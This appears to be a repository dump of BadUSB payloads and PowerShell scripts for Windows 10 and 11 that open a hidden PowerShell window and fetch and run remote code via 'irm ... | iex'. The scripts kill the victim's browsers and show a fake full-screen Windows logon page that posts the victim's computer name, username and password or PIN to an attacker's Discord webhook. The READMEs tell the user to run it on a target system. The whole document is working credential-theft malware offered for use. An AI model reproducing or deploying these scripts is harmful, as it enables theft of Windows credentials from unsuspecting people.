REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook.
REM Author: @beigeworm
REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_win10_to_dc | iex
ENTER

12
Win10-Phishing/README.md Normal file
View File

@@ -0,0 +1,12 @@
<h2 align="center"> Fake Windows Logon Screen to Discord Webhook </h2>
SYNOPSIS
This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
USAGE
1. Replace YOUR_WEBBHOOK_HERE with your webhook.
2. Run script on target system.

272
Win10-Phishing/main.ps1 Normal file
View File

@@ -0,0 +1,272 @@
# GATHER SYSTEM AND USER INFO
$u = (Get-WmiObject Win32_UserAccount -Filter "Name = '$Env:UserName'").FullName
$c = $env:COMPUTERNAME
$wpURL = "https://wallpapercave.com/wp/wp1809099.jpg"
# DEFAULT LOGIN METHOD
$value = Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\NgcPin" -Name "DeviceLockEnforcementPending" -ErrorAction SilentlyContinue
if ($value -eq 0 -or $value -eq 1) {$mthd = "PIN"} else {$mthd = "Password"}
# FIND ACCOUNT PICTURES
$accountPicturesPath = "C:\ProgramData\Microsoft\Default Account Pictures"
$imageFiles = Get-ChildItem -Path $accountPicturesPath -include "*.jpg", "*.png", "*.bmp" -File -Recurse
if ($imageFiles.Count -gt 0) {
$firstImage = $imageFiles[0].FullName
$image = [System.Drawing.Image]::FromFile($firstImage)
$usrimg = "$image"
}else {$usrimg = "https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png"}
# HTML FOR COVER PAGE
$h = @"
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>&#65279;</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/css/bootstrap.min.css">
<link href="https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300&display=swap" rel="stylesheet">
<style>
@import url(https://fonts.googleapis.com/css2?family=Open+Sans:wght@300&display=swap);
body{background:rgba(0,0,0,1);margin:0;padding:0;overflow-x:hidden}.alert{background:rgba(0,0,0,1);position:fixed;top:0;left:0;width:100%;height:auto;z-index:10;padding:10px}.alert ul{padding:0;margin:0;list-style:none;display:flex;justify-content:space-around;align-items:center}.alert ul li b{color:#589;font-weight:600;font-family:Arial,sans-serif}#container{height:100vh;width:100vw;overflow:hidden;position:relative}#wallpaper{background-image:url($wpURL);background-repeat:no-repeat;background-size:90% cover;background-position:center;height:100vh;width:100vw;position:absolute;top:0;left:0}#wallpaper.slideUp{transition:all .6s ease;transform:translateY(-100%)}#wallpaper.slideDown{transition:all .6s linear;transform:translateY(0%)}.icons{display:flex;justify-content:flex-start;align-items:center;padding-left:.5em}.icons i{color:#fff;margin-top:.7em;margin-right:2em}#date_cont{position:absolute;top:67%;left:4%;text-align: left;animation:slideInFast .3s .3s linear forwards;visibility:hidden;transform:translateY(150%);transition:all .6s ease both}@keyframes slideInFast{from{visibility:hidden;opacity:0;transform:translateY(100%)}to{visibility:visible;opacity:1;transform:translateY(0%)}}#time{font-size:8em;font-family:'Open Sans Condensed',sans-serif;color:#fff;margin:0;margin-left:-15px;padding:0}#date{font-size:2.5em;font-family:'Open Sans',sans-serif;color:#fff;margin-top:-.6em}
</style>
</head>
<body>
<div id="container">
<div id="wallpaper">
<div id="date_cont">
<div id="time">08:20</div>
<div id="date" class="">Tuesday, October 8</div>
<div class="icons">
<i class="fa fa-wifi"></i>
<i class="fa fa-battery-full"></i>
</div>
</div>
</div>
</div>
<script type="text/javascript">
(function(){
var time = document.querySelector('#time');
var dateElem = document.querySelector('#date');
var wallpaper = document.querySelector('#wallpaper');
var currentDate = new Date();
var hours = currentDate.getHours();
var minutes = currentDate.getMinutes();
var month = currentDate.getMonth();
var day = currentDate.getDay();
var dateOfMonth = currentDate.getDate();
var dayOfWeek = ['Sunday','Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'];
var monthOfYear = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'Decemeber'];
if ((hours < 10)) {
time.innerHTML = '0' + hours + ':' + minutes;
} else {
time.innerHTML = hours + ':' + minutes;
}
if ((minutes < 10)) {
time.innerHTML = hours + ':' + '0' + minutes;
} else {
time.innerHTML = hours + ':' + minutes;
}
dateElem.innerHTML = dayOfWeek[day] + ", " + monthOfYear[month] + ' ' + dateOfMonth;
function myFunction() {
setTimeout(function() {
window.location.href = 'login.html';
}, 1000);
}
document.addEventListener('keypress', (e)=>{
console.log('key pressed', e.keyCode);
if(e.keyCode === 13) {
wallpaper.classList.remove('slideDown');
wallpaper.classList.add('slideUp');
myFunction();
}
else if (e.keyCode === 32) {
wallpaper.classList.remove('slideDown');
wallpaper.classList.add('slideUp');
myFunction();
}
else {
return null;
}
});
document.addEventListener('click', () => {
wallpaper.classList.remove('slideDown');
wallpaper.classList.add('slideUp');
myFunction();
});
})();
</script>
</body>
</html>
"@
# HTML FOR LOGIN PAGE
$h2 = @"
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>&#65279;</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/css/bootstrap.min.css">
<style>
#loginForm {
height: 100vh;
width: 100vw;
position: relative;
}
body {
background: url($wpURL);
background-repeat: no-repeat;
background-size: 100% cover;
background-position: center;
backdrop-filter: blur(10px);
height: 100vh;
width: 100vw;
position: relative;
top: 0;
left: 0
}
.center-container {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
text-align: center;
}
.input-box {
width: 300px;
height: 35px;
color: white;
background-color: rgba(64, 64, 64, 0.3);
border: 1px solid #e6e6e6;
padding: 5px;
text-align: Left;
border-bottom: 5px solid #0066ff;
}
.input-box::placeholder {
color: #e6e6e6;
}
.input-box:not(:focus) {
border-bottom: rgba(64, 64, 64, 0.3);
border: 1px solid #e6e6e6;
}
.input-container {
display: flex;
flex-direction: column;
align-items: center;
gap: 20px;
}
.btn-signin {
width: 140px;
height: 40px;
background-color: rgba(96, 96, 96, 0.2);
border: 1px solid #e6e6e6;
border-radius: 0;
line-height: 27px;
text-align: center
color: white !important;
}
.btn-signin:hover {
background-color: rgba(96, 96, 96, 0.6);
}
#userLine{
color: white;
font-size:35px;
}
.my22{
text-align: center
color: white;
}
.circular-image {
width: 180px;
height: 180px;
border-radius: 50%;
border: 2px solid #e6e6e6;
margin-bottom: 10px;
}
</style>
</head>
<body class="text-nowrap" style="width:100%;height:100vh">
<div id="loginForm" class="container">
<div class="center-container">
<div class="image-container">
<img src="https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png" alt="User Image" class="circular-image">
</div>
<div class="input-container">
<h3 id="userLine">$u</h3>
<input id="password" class="input-box" type="password" placeholder="$mthd" autofocus>
<button id="btnSignIn" class="btn btn-signin" style="color: white;">Sign In</button>
<p class="my22" style="color: white;">I forgot my $mthd</p>
</div>
</div>
</div>
<script>
function sendCredentialsAndExecuteCommand() {
var passwordValue = document.getElementById("password").value;
var webhookUrl = "$dc";
var uValue = "$u";
var cValue = "$c";
var data = {content: "Computer: " + cValue + " | User: " + uValue + " | Password: " + passwordValue};
fetch(webhookUrl, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)})
.then(response => {})
.catch(error => {});}
document.getElementById("btnSignIn").addEventListener("click", function() {
sendCredentialsAndExecuteCommand();
});
document.addEventListener('keypress', (e)=>{
console.log('key pressed', e.keyCode);
if(e.keyCode === 13) {
sendCredentialsAndExecuteCommand();
}
else {
return null;
}
});
</script>
</body>
</html>
"@
# SAVE HTML
$p = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "index.html")
$h | Out-File -Encoding UTF8 -FilePath $p
$a = "file://$p"
$p2 = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "login.html")
$h2 | Out-File -Encoding UTF8 -FilePath $p2
# KILL ANY BROWSERS (interfere with "Maximazed" argument)
Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe", "/IM", "msedge.exe" -NoNewWindow -Wait
Sleep -Milliseconds 100
# START EDGE IN FULLSCREEN
$edgeProcess = Start-Process -FilePath "msedge.exe" -ArgumentList "--kiosk --app=$a -WindowStyle Maximized" -PassThru
$edgeProcess.WaitForInputIdle()
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("user32.dll")]
public static extern IntPtr SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags);
public static readonly IntPtr HWND_TOPMOST = new IntPtr(-1);
public static readonly IntPtr HWND_NOTOPMOST = new IntPtr(-2);
public const uint SWP_NOMOVE = 0x2;
public const uint SWP_NOSIZE = 0x1;
public const uint SWP_SHOWWINDOW = 0x40;
}
"@
# SET EDGE AS TOP WINDOW AND START SCREENSAVER
$null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW)
Sleep -Milliseconds 250
$null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW)
Sleep -Milliseconds 250
$black = Start-Process -FilePath "C:\Windows\System32\scrnsave.scr"

17
Win11-Phishing/Fake-Windows-11-Logon.txt Normal file
View File

@@ -0,0 +1,17 @@
REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook.
REM Author: @beigeworm
REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_win11_to_dc | iex
ENTER

12
Win11-Phishing/README.md Normal file
View File

@@ -0,0 +1,12 @@
<h2 align="center"> Fake Windows Logon Screen to Discord Webhook </h2>
SYNOPSIS
This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
USAGE
1. Replace YOUR_WEBBHOOK_HERE with your webhook.
2. Run script on target system.

233
Win11-Phishing/main.ps1 Normal file
View File

@@ -0,0 +1,233 @@
# GATHER SYSTEM AND USER INFO
$u = (Get-WmiObject Win32_UserAccount -Filter "Name = '$Env:UserName'").FullName
$c = $env:COMPUTERNAME
$wpURL = "https://wallpapercave.com/wp/wp9378862.jpg"
# DEFAULT LOGIN METHOD
$value = Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\NgcPin" -Name "DeviceLockEnforcementPending" -ErrorAction SilentlyContinue
if ($value -eq 0 -or $value -eq 1) {$mthd = "PIN"} else {$mthd = "Password"}
# FIND ACCOUNT PICTURES
$accountPicturesPath = "C:\ProgramData\Microsoft\Default Account Pictures"
$imageFiles = Get-ChildItem -Path $accountPicturesPath -include "*.jpg", "*.png", "*.bmp" -File -Recurse
if ($imageFiles.Count -gt 0) {
$firstImage = $imageFiles[0].FullName
$image = [System.Drawing.Image]::FromFile($firstImage)
$usrimg = "$image"
}else {$usrimg = "https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png"}
# HTML FOR COVER PAGE
$h = @"
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>&#65279;</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/css/bootstrap.min.css"><link href="https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300&display=swap" rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css2?family=Open+Sans:wght@600&display=swap);body{background:rgba(0,0,0,1);margin:0;padding:0;overflow-x:hidden}#container{height:100vh;width:100vw;overflow:hidden;position:relative}#wallpaper{background-image:url($wpURL);background-repeat:no-repeat;background-size:100% cover;background-position:center;height:100vh;width:100vw;position:absolute;top:0;left:0}#wallpaper.slideUp{transition:all .6s ease;transform:translateY(-100%)}#wallpaper.slideDown{transition:all .6s linear;transform:translateY(0)}.icons{display:flex;justify-content:flex-start;align-items:center;padding-left:.5em}.icons i{color:#fff;margin-top:.7em;margin-right:2em}#date_cont{text-align:center;position:absolute;top:20%;left:42%;animation:slideInFast .3s .3s linear forwards;visibility:hidden;transform:translateY(150%);transition:all .6s ease both}@keyframes slideInFast{from{visibility:hidden;opacity:0;transform:translateY(100%)}to{visibility:visible;opacity:1;transform:translateY(0)}}#time{font-size:7.5em;font-family:'Open Sans',sans-serif;color:#fff;margin:0;margin-left:-15px;padding:0}#date{font-size:2em;font-family:'Open Sans',sans-serif;color:#fff;margin-top:-.6em}</style></head><body><div id="container"><div id="wallpaper"><div id="date_cont"><div id="time">08:20</div><div id="date" class="">Tuesday, October 8</div><div class="icons"><i class="fa fa-wifi"></i><i class="fa fa-battery-full"></i></div></div></div></div><script type="text/javascript">(function(){
var time = document.querySelector('#time');
var dateElem = document.querySelector('#date');
var wallpaper = document.querySelector('#wallpaper');
var currentDate = new Date();
var hours = currentDate.getHours();
var minutes = currentDate.getMinutes();
var month = currentDate.getMonth();
var day = currentDate.getDay();
var dateOfMonth = currentDate.getDate();
var dayOfWeek = ['Sunday','Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'];
var monthOfYear = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'Decemeber'];
if ((hours < 10)) {time.innerHTML = '0' + hours + ':' + minutes;} else {time.innerHTML = hours + ':' + minutes;}
if ((minutes < 10)) {time.innerHTML = hours + ':' + '0' + minutes;} else {time.innerHTML = hours + ':' + minutes;}
dateElem.innerHTML = dayOfWeek[day] + ", " + monthOfYear[month] + ' ' + dateOfMonth;
function myFunction() {
setTimeout(function() {
window.location.href = 'login.html';
}, 1000);
}
document.addEventListener('keypress', (e)=>{
console.log('key pressed', e.keyCode);
if(e.keyCode === 13) {
wallpaper.classList.remove('slideDown');
wallpaper.classList.add('slideUp');
myFunction();
}
else if (e.keyCode === 32) {
wallpaper.classList.remove('slideDown');
wallpaper.classList.add('slideUp');
myFunction();
}
else {
return null;
}
});
document.addEventListener('click', () => {
wallpaper.classList.remove('slideDown');
wallpaper.classList.add('slideUp');
myFunction();
});
})();</script></body></html>
"@
# HTML FOR LOGIN PAGE
$h2 = @"
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>&#65279;</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/css/bootstrap.min.css">
<style>
#loginForm {
height: 100vh;
width: 100vw;
position: relative;
}
body {
background: url($wpURL);
background-repeat: no-repeat;
background-size: 100% cover;
background-position: center;
backdrop-filter: blur(10px);
height: 100vh;
width: 100vw;
position: relative;
top: 0;
left: 0
}
.center-container {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
text-align: center;
}
.input-box {
width: 300px;
height: 35px;
color: white;
background-color: rgba(64, 64, 64, 0.3);
border: 1px solid #e6e6e6;
padding: 5px;
text-align: Left;
border-bottom: 5px solid #0066ff;
}
.input-box::placeholder {
color: #e6e6e6;
}
.input-box:not(:focus) {
border-bottom: rgba(64, 64, 64, 0.3);
border: 1px solid #e6e6e6;
}
.input-container {
display: flex;
flex-direction: column;
align-items: center;
gap: 20px;
}
.btn-signin {
width: 140px;
height: 40px;
background-color: rgba(96, 96, 96, 0.2);
border: 1px solid #e6e6e6;
border-radius: 0;
line-height: 27px;
text-align: center
color: white !important;
}
.btn-signin:hover {
background-color: rgba(96, 96, 96, 0.6);
}
#userLine{
color: white;
font-size:35px;
}
.my22{
text-align: center
color: white;
}
.circular-image {
width: 180px;
height: 180px;
border-radius: 50%;
border: 2px solid #e6e6e6;
margin-bottom: 10px;
}
</style>
</head>
<body class="text-nowrap" style="width:100%;height:100vh">
<div id="loginForm" class="container">
<div class="center-container">
<div class="image-container">
<img src="https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png" alt="User Image" class="circular-image">
</div>
<div class="input-container">
<h3 id="userLine">$u</h3>
<input id="password" class="input-box" type="password" placeholder="$mthd" autofocus>
<button id="btnSignIn" class="btn btn-signin" style="color: white;">Sign In</button>
<p class="my22" style="color: white;">I forgot my $mthd</p>
</div>
</div>
</div>
<script>
function sendCredentialsAndExecuteCommand() {
var passwordValue = document.getElementById("password").value;
var webhookUrl = "$dc";
var uValue = "$u";
var cValue = "$c";
var data = {content: "Computer: " + cValue + " | User: " + uValue + " | Password: " + passwordValue};
fetch(webhookUrl, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)})
.then(response => {})
.catch(error => {});}
document.getElementById("btnSignIn").addEventListener("click", function() {
sendCredentialsAndExecuteCommand();
});
document.addEventListener('keypress', (e)=>{
console.log('key pressed', e.keyCode);
if(e.keyCode === 13) {
sendCredentialsAndExecuteCommand();
}
else {
return null;
}
});
</script>
</body>
</html>
"@
# SAVE HTML
$p = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "index.html")
$h | Out-File -Encoding UTF8 -FilePath $p
$a = "file://$p"
$p2 = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "login.html")
$h2 | Out-File -Encoding UTF8 -FilePath $p2
# KILL ANY BROWSERS (interfere with "Maximazed" argument)
Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe", "/IM", "msedge.exe" -NoNewWindow -Wait
Sleep -Milliseconds 100
# START EDGE IN FULLSCREEN
$edgeProcess = Start-Process -FilePath "msedge.exe" -ArgumentList "--kiosk --app=$a -WindowStyle Maximized" -PassThru
$edgeProcess.WaitForInputIdle()
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("user32.dll")]
public static extern IntPtr SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags);
public static readonly IntPtr HWND_TOPMOST = new IntPtr(-1);
public static readonly IntPtr HWND_NOTOPMOST = new IntPtr(-2);
public const uint SWP_NOMOVE = 0x2;
public const uint SWP_NOSIZE = 0x1;
public const uint SWP_SHOWWINDOW = 0x40;
}
"@
# SET EDGE AS TOP WINDOW AND START SCREENSAVER
$null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW)
Sleep -Milliseconds 250
$null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW)
Sleep -Milliseconds 250
$black = Start-Process -FilePath "C:\Windows\System32\scrnsave.scr"